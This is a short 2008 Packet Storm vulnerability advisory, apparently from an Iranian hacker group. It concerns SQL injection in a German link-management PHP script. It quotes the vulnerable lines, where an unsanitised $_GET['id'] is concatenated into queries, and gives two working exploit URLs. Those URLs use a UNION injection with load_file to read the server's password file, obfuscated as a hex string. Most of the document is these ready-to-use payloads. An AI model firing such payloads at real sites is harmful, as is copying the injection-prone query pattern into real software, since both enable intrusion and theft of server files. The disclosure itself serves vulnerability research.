kostenloses-sql.txt

2008-05-15T00:00:00
ID PACKETSTORM:66413
Type packetstorm
Reporter hadihadi
Modified 2008-05-15T00:00:00

Description

                                        
                                            ` #######################################################################################  
# #  
# ...::::Kostenloses Linkmanagementscript SQL Injection Vulnerabilities ::::... #   
#######################################################################################  
  
Virangar Security Team  
  
www.virangar.net  
  
--------  
Discoverd By :virangar security team(hadihadi)  
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-----  
  
-------vuln codes in:-----------  
top_view.php:  
line 3:$id = $_GET['id'];  
..  
..  
ine 19:$voting_page_command_sql = "SELECT votings, worth FROM ".$tab_links." WHERE id = '".$id."'";  
*********  
view.php:  
line 8:$id = $_GET['id'];  
line 9:$view_page_command_sql = "SELECT url, hits FROM ".$tab_links." WHERE id = '".$id."'";  
---  
exploits:  
http://site.com/[patch]/view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*  
http://site.com/[patch]/top_view.php?id='/**/union/**/select/**/now(),load_file(0x2f6574632f706173737764)/**/from/**/mysql.user/*  
---  
young iranian h4ck3rz  
`